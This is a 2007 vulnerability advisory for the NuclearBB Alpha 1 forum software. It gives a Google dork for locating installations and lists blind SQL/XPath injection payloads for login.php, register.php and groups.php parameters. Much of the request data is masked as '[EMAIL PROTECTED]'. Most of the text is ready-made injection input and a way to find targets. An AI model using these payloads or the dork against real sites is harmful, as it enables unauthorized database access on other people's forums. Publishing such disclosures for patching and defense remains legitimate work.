NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection Vulnerabilities Vulnerable: NuclearBB Alpha 1 Google d0rk: "This forum is powered by NuclearBB"
============= String Inputs ============= ---------------------------- login.php - $_POST['submit'] ---------------------------- username=xyz password=passxyz submit=Login"+and+"1"="0 -------------------------------- register.php - $_POST['website'] -------------------------------- [EMAIL PROTECTED] [EMAIL PROTECTED] pass1=passwordxyz pass2=passwordxyz [EMAIL PROTECTED]"+and+"1"="0 [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] coppa_state=over register_submit=Register ---------------------------- register.php - $_POST['aol'] ---------------------------- [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED]"+and+"1"="0 [EMAIL PROTECTED] [EMAIL PROTECTED] coppa_state=over register_submit=Register ---------------------------------- register.php - $_POST['signature'] ---------------------------------- [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED]"+and+"1"="0 coppa_state=over register_submit=Register ============== Numeric Inputs ============== ----------------------- groups.php - $_GET['g'] ----------------------- http://www.example.com/groups.php?g=1+and+1=0 ------------------------------ register.php - $_POST['email'] ------------------------------ [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] coppa_state=over®ister_submit=Register John Martinelli [EMAIL PROTECTED] http://john-martinelli.com April 18th, 2007